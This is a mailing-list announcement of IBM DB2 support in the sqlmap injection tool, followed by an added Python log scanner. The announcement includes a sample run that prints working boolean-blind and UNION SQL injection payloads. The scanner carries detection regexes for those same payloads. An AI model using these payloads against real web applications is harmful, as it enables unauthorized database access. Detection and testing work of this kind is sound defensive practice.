Hi,

The long awaited IBM DB2 support has been implemented in sqlmap. The patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH and merged in sqlmap repository after some tweaking by us. It is very stable for both DB2 8.x and 9.x branches.

The patch includes support to fingerprint and enumerate data on IBM DB2 via boolean-based blind SQL injection and UNION query SQL injection. Hopefully, soon someone will come up with a payload for time-based and error-based techniques too. Support for direct connection to the DBMS (-d switch) will be implemented soon as well.

Thank you Sebastian and the rest of the team at r-tec for your patch and support!

Sample run against an IBM DB2 9.7 test environment:

--8<--
$ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user

    sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:56:21

[10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
[10:56:21] [INFO] testing connection to the target url
[10:56:23] [INFO] heuristics detected web page charset 'ascii'
[10:56:23] [INFO] testing if the url is stable, wait a few seconds
[10:56:25] [INFO] url is stable
[10:56:25] [INFO] testing if GET parameter 'id' is dynamic
[10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
[10:56:26] [INFO] GET parameter 'id' is dynamic
[10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
[10:56:27] [INFO] testing sql injection on GET parameter 'id'
[10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
[10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
---

[10:58:58] [INFO] testing IBM DB2
[10:58:59] [INFO] confirming IBM DB2
[10:59:12] [INFO] the back-end DBMS is IBM DB2
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: active fingerprint: IBM DB2 9.7
               html error message fingerprint: DB2
[10:59:12] [INFO] fetching banner
banner: 'DB2 v9.7.400.501'
[10:59:13] [INFO] fetching current user
current user: 'TEST'
--8<--

Bernardo

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
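A defender's view of the two payloads in the sample run above, as an added example that is not part of the original e-mail or of sqlmap: a small access-log check that flags the `CHR()` concatenation chain, the `SYSIBM.SYSDUMMY1` reference and the numeric tautology, and decodes the chain to show the marker string it spells. The log format, client address, timestamps and all function and rule names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# The two payloads from the sample run above, rebuilt so the lines stay short.
UNION_PAYLOAD = ("1' UNION ALL SELECT "
                 + "||".join(f"CHR({b})" for b in b":nrr:ZgAXBmEJMu:eql:")
                 + " FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM")
BLIND_PAYLOAD = "1' AND 7118=7118 AND 'Skhh'='Skhh"

def log_line(value, size):
    """Build a constructed access-log line (address, time and size are made up)."""
    return ('198.51.100.7 - - [01/Jan/2011:10:56:27 +0000] '
            f'"GET /page.php?id={quote(value)} HTTP/1.1" 200 {size}')

SAMPLE_LOG = [log_line("1", 512), log_line(UNION_PAYLOAD, 498),
              log_line(BLIND_PAYLOAD, 512)]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Four or more CHR(n) calls joined with ||: a string assembled from character
# codes instead of a quoted literal.
CHR_CHAIN = re.compile(r"(?:CHR\(\d{1,3}\)\s*\|\|\s*){3,}CHR\(\d{1,3}\)", re.I)
# AND <n>=<n> with the same number on both sides.
TAUTOLOGY = re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)

def decode_chr_chain(chain):
    """Turn CHR(58)||CHR(110)||... back into the string it spells."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", chain))

def inspect(line):
    """Return (parameter, rule, evidence) tuples for one access-log line."""
    request = REQUEST.search(line)
    if not request:
        return []
    findings = []
    query = urlsplit(request.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        chain = CHR_CHAIN.search(value)
        if chain:
            findings.append((name, "chr-chain", decode_chr_chain(chain.group(0))))
        if "SYSIBM.SYSDUMMY1" in value.upper():
            findings.append((name, "db2-dummy-table", "SYSIBM.SYSDUMMY1"))
        tautology = TAUTOLOGY.search(value)
        if tautology:
            findings.append((name, "numeric-tautology", tautology.group(0)))
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry) or "clean")
```

The numeric-tautology rule is a heuristic and can fire on legitimate search strings, so treat it as a lead to correlate with the other two rules rather than a verdict.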